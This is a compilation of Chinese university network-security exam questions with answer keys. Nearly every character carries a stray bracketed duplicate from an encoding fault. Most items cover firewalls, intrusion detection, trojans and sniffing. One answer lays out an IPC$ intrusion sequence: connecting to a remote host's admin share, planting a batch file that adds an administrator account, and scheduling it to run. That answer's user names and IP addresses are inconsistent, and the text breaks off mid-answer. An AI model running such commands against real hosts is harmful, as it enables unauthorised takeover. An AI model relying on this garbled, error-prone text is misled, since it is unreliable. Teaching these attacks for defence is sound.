大學(xué)試題(計算機(jī)科學(xué))-網(wǎng)絡(luò)安全技術(shù)筆試（2018-2023年）真題摘選含答案

長風(fēng)破浪會有時，直掛云帆濟(jì)滄海。大學(xué)試題(計算機(jī)科學(xué))-網(wǎng)絡(luò)安全技術(shù)筆試（2018-2023年）真題摘選含答案（圖片大小可自由調(diào)整）卷I一.參考題庫(共30題)1.信息安全目標(biāo)CIA中A指的是可用性。2.黑客分為多種，（）的原則是“誰給錢多給誰干”。A、破壞者B、紅客C、間諜D、駭客3.竊聽是一種（）攻擊，攻擊者（）將自己的系統(tǒng)插入到發(fā)送站和接收站之間。截獲是一種（）攻擊，攻擊者（）將自己的系統(tǒng)插入到發(fā)送站和接受站之間。A、被動；無須；主動；必須B、主動；必須；被動；無須C、主動；無須；被動；必須D、被動；必須；主動；無須4.在以下人為的惡意攻擊中，屬于主動攻擊的是（）。A、身份假冒B、數(shù)據(jù)竊聽C、數(shù)據(jù)流分析D、非法訪問5.計算機(jī)病毒按按入侵的途徑分為（）4種。6.屏蔽路由器型防火墻采用的技術(shù)是基于（）。A、數(shù)據(jù)包過濾技術(shù)B、應(yīng)用網(wǎng)關(guān)技術(shù)C、代理服務(wù)技術(shù)D、三種技術(shù)的結(jié)合7.PGP加密技術(shù)是一個基于DES對稱密鑰體系的郵件加密軟件。8.用IPC$入侵方法在遠(yuǎn)程主機(jī)192.168.11.1上建立一個帳號為STU2，并加入administrators過程。9.使用防病毒軟件時，一般要求用戶每隔2周進(jìn)行升級，這樣做的目的是（）。A、對付最新的病毒，因此需要下載最新的程序B、程序中有錯誤，所以要不斷升級，消除程序中的BUGC、新的病毒在不斷出現(xiàn)，因此需要用及時更新病毒的特征碼資料庫D、以上說法的都不對10.在遠(yuǎn)程機(jī)器192.168.1.23上把帳號stu加入administrators組的net完整命令是（）。11.會話層的主要功能是允許不同機(jī)器上用戶之間建立會話關(guān)系。12.防火墻不能防止來自網(wǎng)絡(luò)內(nèi)部的攻擊。13.計算機(jī)病毒按破壞的程度分：可分為（）和（）。14.下面（）不是網(wǎng)絡(luò)端口掃描工具。A、SuperscanB、HostScanC、X-ScannerD、SnifferPRO15.說一說重點(diǎn)對付DDoS攻擊的一些常規(guī)的網(wǎng)絡(luò)攻擊防范的方法？16.什么是網(wǎng)絡(luò)嗅探？17.一般木馬程序包括（）和（）兩個程序。18.掃描的主要技術(shù)有：（）。19.請解釋5種“非法訪問”攻擊方式的含義。20.口令破解的方法有很多，最為常見的有（）和暴力破解。21.計算機(jī)網(wǎng)絡(luò)安全的目的什么？22.保證操作系統(tǒng)的安全是網(wǎng)管的第一要務(wù)，通過（）可以針對Windows操作系統(tǒng)進(jìn)行有效的安全加固，從而為其他應(yīng)用構(gòu)筑最基礎(chǔ)的安全平臺。A、使用強(qiáng)壯的密碼，不使用諸如生日、電話號碼等易被猜測的口令B、定時安裝系統(tǒng)補(bǔ)丁，及時修補(bǔ)操作系統(tǒng)的漏洞C、只啟必需的服務(wù)，關(guān)閉不必要的服務(wù)和端口D、安裝防火墻和入侵檢測系統(tǒng)23.網(wǎng)絡(luò)監(jiān)聽的手段是截獲通信的內(nèi)容，監(jiān)聽的目的是對協(xié)議進(jìn)行分析。24.直接利用ping工具發(fā)送超大的ping數(shù)據(jù)包，這種攻擊稱為PingofDeath。25.用戶收到了一封可疑的電子郵件，要求用戶提供銀行賬戶及密碼，這是屬于何種攻擊手段？（）A、緩存溢出攻擊B、釣魚攻擊C、暗門攻擊D、DDOS攻擊26.目前，VPN使用了（）技術(shù)保證了通信的安全性。A、隧道協(xié)議、身份認(rèn)證和數(shù)據(jù)加密B、身份認(rèn)證、數(shù)據(jù)加密C、隧道協(xié)議、身份認(rèn)證D、隧道協(xié)議、數(shù)據(jù)加密27.在校園的局域網(wǎng)中捕獲到一個以太網(wǎng)幀，此幀的全部數(shù)據(jù)如下圖所示. 此幀的用途和目的是什么？28.入侵檢測系統(tǒng)從分析方式上主要可分為兩種：（）。29.一般認(rèn)為蠕蟲是一種通過網(wǎng)絡(luò)傳播的惡性病毒，它具有病毒的一切共性，如傳播性、隱蔽性、破壞性等。30.代理服務(wù)作為防火墻技術(shù)主要在OSI的哪一層實(shí)現(xiàn)（）。A、數(shù)據(jù)鏈路層B、網(wǎng)絡(luò)層C、表示層D、應(yīng)用層卷I參考答案一.參考題庫1.參考答案:正確2.參考答案:C3.參考答案:A4.參考答案:A5.參考答案:源碼型病毒、入侵型病毒、操作系統(tǒng)型病毒、外殼型病毒6.參考答案:B7.參考答案:錯誤8.參考答案: ①、netuse//192.168.11.1/ipc$“password”/user:”admin” ②、建立文件hacker.bat，其內(nèi)容： netusers1123/add netlocalgroupadministratorsstu/add ③、copyhacker.bat//192.169.11.1/c$ ④、nettime//192.168.11.1(取得時間t) ⑤、at//192.168.11.1t+3c:/hacker.bat9.參考答案:C10.參考答案:Netlocalgroupadministratorsstu/add11.參考答案:正確12.參考答案:正確13.參考答案:良性病毒；惡性病毒14.參考答案:D15.參考答案:定期掃描，在骨干節(jié)點(diǎn)配置防火墻，用足夠的機(jī)器承受黑客攻擊，充分利用網(wǎng)絡(luò)設(shè)備保護(hù)網(wǎng)絡(luò)資源，過濾不必要的服務(wù)和端口，檢查訪問者的來源，限制SYN/ICMP流量等。16.參考答案: 嗅探（Sniffer）技術(shù)是網(wǎng)絡(luò)安全檢測技術(shù)中很重要的一種，它是一種可以捕獲網(wǎng)絡(luò)報文的軟件工具或者設(shè)備，網(wǎng)絡(luò)安全管理人員會經(jīng)常借助此類工具對網(wǎng)絡(luò)的各種活動進(jìn)行實(shí)時監(jiān)測，發(fā)現(xiàn)網(wǎng)絡(luò)中的攻擊行為。與主動掃描相比，嗅探的行為更難察覺，因此，黑客也會利用具有很強(qiáng)非常隱蔽性的嗅探技術(shù)攫取網(wǎng)絡(luò)中的敏感信息。17.參考答案:服務(wù)器端；客戶端18.參考答案:存活性掃描、端口掃描、服務(wù)識別、操作系統(tǒng)識別19.參考答案: 1）口令破解 攻擊者可以通過獲取口令文件然后運(yùn)用口令破解工具進(jìn)行字典攻擊或暴力攻擊來獲得口令，也可通過猜測或竊聽等方式獲取口令，從而進(jìn)入系統(tǒng)進(jìn)行非法訪問，選擇安全的口令非常重要。這也是黑客入侵中真正攻擊方式的一種。 2）IP欺騙 攻擊者可通過偽裝成被信任源IP地址等方式來騙取目標(biāo)主機(jī)的信任，這主要針對LinuxUNIX下建立起IP地址信任關(guān)系的主機(jī)實(shí)施欺騙。這也是黑客入侵中真正攻擊方式的一種。 3）DNS欺騙 當(dāng)DNS服務(wù)器向另一個DNS服務(wù)器發(fā)送某個解析請求（由域名解析出IP地址）時，因?yàn)椴贿M(jìn)行身份驗(yàn)證，這樣黑客就可以冒充被請求方，向請求方返回一個被篡改了的應(yīng)答（IP地址），將用戶引向黑客設(shè)定的主機(jī)。這也是黑客入侵中真正攻擊方式的一種。 4）重放（Replay）攻擊 在消息沒有時間戳的情況下，攻擊者利用身份認(rèn)證機(jī)制中的漏洞先把別人有用的消息記錄下來，過一段時間后再發(fā)送出去。 5）特洛伊木馬（TrojanHorse） 把一個能幫助黑客完成某一特定動作的程序依附在某一合法用戶的正常程序中，而一旦用戶觸發(fā)正常程序，黑客代碼同時被激活，這些代碼往往能完成黑客早已指定的任務(wù)（如監(jiān)聽某個不常用端口，假冒登錄界面獲取帳號和口令等）。20.參考答案:猜解簡單口令、字典破解21.參考答案:計算機(jī)網(wǎng)絡(luò)安全的目的簡單地說就是要充分利用現(xiàn)有的各種網(wǎng)絡(luò)安全技術(shù)手段使計算機(jī)網(wǎng)絡(luò)的使用者獲得良好的網(wǎng)絡(luò)安全使用環(huán)境。22.參考答案:A,B,C23.參考答案:錯誤24.參考答案:正確25.參考答案:B26.參考答案:A27.參考答案: 地址解析協(xié)議的ARP查詢。28.參考答案:模式發(fā)現(xiàn)技術(shù)（模式匹配）、異常發(fā)現(xiàn)技術(shù)（異常檢測）29.參考答案:正確30.參考答案:D卷II一.參考題庫(共30題)1.說一說木馬的防治方法？2.加密技術(shù)不能實(shí)現(xiàn)（）。A、數(shù)據(jù)信息的完整性B、基于密碼技術(shù)的身份認(rèn)證C、機(jī)密文件加密D、基于IP的頭信息的包過濾3.交換機(jī)是企業(yè)局域網(wǎng)絡(luò)正常運(yùn)行的關(guān)鍵設(shè)備，作為一名網(wǎng)管需要采?。ǎ┑陌踩芾泶胧┎拍鼙ＷC企業(yè)網(wǎng)用戶正常的網(wǎng)絡(luò)通信。A、通過VLAN把局域網(wǎng)分段管理B、設(shè)置難度較高的管理口令C、連接到路由器上D、將多臺交換機(jī)疊加起來使用4.在校園的局域網(wǎng)中捕獲到一個以太網(wǎng)幀，此幀的全部數(shù)據(jù)如下圖所示. 它的目的IP地址是（），它屬于（）地址。5.命令netusez://192.168.11.6/c$成功執(zhí)行的結(jié)果是什么？6.下圖是一臺計算機(jī)訪問一個Web網(wǎng)站時SNIFFER獲取的數(shù)據(jù)包序列。 Web服務(wù)器的IP地址是（），它屬于（）地址。7.電路級網(wǎng)關(guān)是以下哪一種軟/硬件的類型？（）A、防火墻B、入侵檢測軟件C、端口D、商業(yè)支付程序8.什么是流氓軟件？9.加密在網(wǎng)絡(luò)上的作用就是防止有價值的信息在網(wǎng)上被（）。A、攔截和破壞B、攔截和竊取C、篡改和損壞D、篡改和竊取10.簡述木馬攻擊的過程.11.在以下認(rèn)證方式中，最常用的認(rèn)證方式是：（）A、基于賬戶名／口令認(rèn)證B、基于摘要算法認(rèn)證C、基于PKI認(rèn)證D、基于數(shù)據(jù)庫認(rèn)證12.密鑰生成形式有兩種：一種是由（）生成，另一種是由個人分散生成。13.注冊表中DWORD數(shù)據(jù)類型的長度為（）個字節(jié)。14.下面（）不是網(wǎng)絡(luò)攻擊的防范方法。A、定期掃描B、配置防火墻C、機(jī)器冗余D、流量均衡15.刪除賬號stu的命令是（）（密碼是123）。A、netuser123stuB、netuser123stu/delC、netuse123stu/delD、netuserstu123/del16.木馬是一種可以駐留在對方客戶端系統(tǒng)中的一種程序。17.Hash函數(shù)是可接受（）數(shù)據(jù)輸入，并生成定長數(shù)據(jù)輸出的函數(shù)。18.在校園的局域網(wǎng)中捕獲到一個以太網(wǎng)幀，此幀的全部數(shù)據(jù)如下圖所示. 它的源IP地址是（），它屬于（）IP地址。19.入侵防護(hù)系統(tǒng)（IPS）傾向于提供主動防護(hù)，其設(shè)計宗旨是預(yù)先對入侵活動和攻擊性網(wǎng)絡(luò)流量進(jìn)行攔截，避免其造成損失，而不是簡單地在惡意流量傳送時或傳送后才發(fā)出警報。20.一個完備的入侵檢測系統(tǒng)IDS一定是基于主機(jī)和基于網(wǎng)絡(luò)兩種方式兼?zhèn)涞姆植际较到y(tǒng)。21.什么是IDS，它有哪些基本功能？22.包過濾防火墻中的包過濾器一般安裝在（），工作在網(wǎng)絡(luò)的第三層。23.在OSI七個層次的基礎(chǔ)上，將安全體系劃分為四個級別，以下哪一個不屬于四個級別（）。A、網(wǎng)絡(luò)級安全B、系統(tǒng)級安全C、應(yīng)用級安全D、鏈路級安全24.下面關(guān)于口令的安全描述中錯誤的是（）`。A、口令要定期更換B、口令越長越安全C、容易記憶的口令不安全D、口令中使25.“流氓軟件”通俗的講是指那些在人們使用電腦上網(wǎng)時，產(chǎn)生不受人控制，不斷跳出的與用戶打開的網(wǎng)頁不相干的奇怪畫面，或者是做各種廣告的軟件。26.計算機(jī)病毒是計算機(jī)系統(tǒng)中自動產(chǎn)生的。27.在OSI參考模型中，（）是完成網(wǎng)絡(luò)中主機(jī)間的報文傳輸。A、應(yīng)用層B、網(wǎng)絡(luò)層C、傳輸層D、數(shù)據(jù)鏈路層28.解釋反彈技術(shù)29.網(wǎng)絡(luò)監(jiān)聽是網(wǎng)絡(luò)管理員的工作，監(jiān)聽的內(nèi)容是網(wǎng)絡(luò)信息的流動，監(jiān)聽的工具是（），監(jiān)聽最好的地方是（）、網(wǎng)關(guān)與防火墻。30.說一說網(wǎng)絡(luò)嗅探的檢測方法？卷II參考答案一.參考題庫1.參考答案: ①安裝反病毒軟件。時刻打開殺毒軟件，大多數(shù)反病毒工具軟件幾乎都可檢測到所有的特洛伊木馬，但值得注意的是，應(yīng)及時更新反病毒軟件。 ②安裝特洛伊木馬刪除軟件。反病毒軟件雖然能查出木馬，但卻不能將它從計算機(jī)上刪除。為此必須安裝諸如TROJIAREMOVER之類的軟件。 ③建立個人防火墻。當(dāng)木馬進(jìn)入計算機(jī)時，防火墻可以對你進(jìn)行有效保護(hù)。 ④不要執(zhí)行來歷不明的軟件和程序。木馬的服務(wù)端程序只有在被執(zhí)行后才會生效。通過網(wǎng)絡(luò)下載的文件，QQ或MSN傳輸?shù)奈募?，以及從別人那拷貝來的文件，對電子郵件附件在沒有十足把握的情況下，千萬不要將它打開。最好是在運(yùn)行它之前，先用反病毒軟件對它進(jìn)行檢查。2.參考答案:D3.參考答案:A,B4.參考答案:10.0.26.1；單播5.參考答案:該命令的成功執(zhí)行結(jié)果是在本地機(jī)器上多出一個盤符Z，Z盤實(shí)質(zhì)上就是遠(yuǎn)程機(jī)器的C盤，在本地對Z盤的操作就等于對遠(yuǎn)程機(jī)器C盤的操作。6.參考答案:202.203.208.32；公網(wǎng)7.參考答案:A8.參考答案:“流氓軟件”通俗的講是指那些在人們使用電腦上網(wǎng)時，產(chǎn)生不受人控制，不斷跳出的與用戶打開的網(wǎng)頁不相干的奇怪畫面，或者是做各種廣告的軟件?！傲髅ボ浖笔侵附橛诓《竞驼?guī)軟件之間的一類軟件。9.參考答案:B10.參考答案: ①配置生成服務(wù)端 ②種植木馬 ③上線，一般由主動和自動上線兩種 ④控制操作，實(shí)現(xiàn)攻擊者的意圖11.參考答案:A12.參考答案:中心集中13.參考答案:414.參考答案:D15.參考答案:B16.參考答案:錯誤17.參考答案:變長18.參考答案:10.0.26.12；私網(wǎng)19.參考答案:正確20.參考答案:正確21.參考答案: 入侵檢測系統(tǒng)IDS，它從計算機(jī)網(wǎng)絡(luò)系統(tǒng)中的若干關(guān)鍵點(diǎn)收集信息，并分析這些信息，檢查網(wǎng)絡(luò)中是否有違反安全策略的行為和遭到襲擊的跡象。入侵檢測被認(rèn)為是防火墻之后的第二道安全閘門。 1）監(jiān)測并分析用戶和系統(tǒng)的活動，查找非法用戶和合法用戶的越權(quán)操作； 2）核查系統(tǒng)配置和漏洞并提示管理員修補(bǔ)漏洞； 3）評估系統(tǒng)關(guān)鍵資源和數(shù)據(jù)文件的完整性； 4）識別已知的攻擊行為，統(tǒng)計